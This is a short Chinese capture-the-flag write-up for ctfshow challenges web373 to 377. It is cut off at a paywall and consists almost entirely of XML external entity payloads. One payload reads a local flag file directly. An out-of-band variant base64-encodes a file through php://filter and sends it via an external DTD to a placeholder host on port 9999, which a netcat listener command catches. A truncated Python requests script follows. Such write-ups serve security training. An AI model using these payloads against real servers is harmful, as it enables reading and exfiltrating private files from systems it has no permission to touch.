文章目录
web373
payload
<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yu22x>
<ctfshow>&xxe;</ctfshow>
</yu22x>
web374、375、376
payload
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/flag">
<!ENTITY % aaa SYSTEM "http://xxx/test.dtd">
%aaa;
]>
<root>123</root>
test.dtd
<!ENTITY % dtd "<!ENTITY % xxe SYSTEM 'http://xxx:9999/%file;'> ">
%dtd;
%xxe;
服务器开启监听 nc -lvp 9999
web377
payload
import requests
url = 'http://ddca1082-2f62-4f7f-b8b1-e369e33aa168.chall.ctf.show/'

博客围绕web373 - 378展开,提及各编号对应的payload,还介绍了服务器开启监听的操作,如使用nc -lvp 9999命令,以及通过开启监听获取flag等信息技术相关内容。
最低0.47元/天 解锁文章
1973





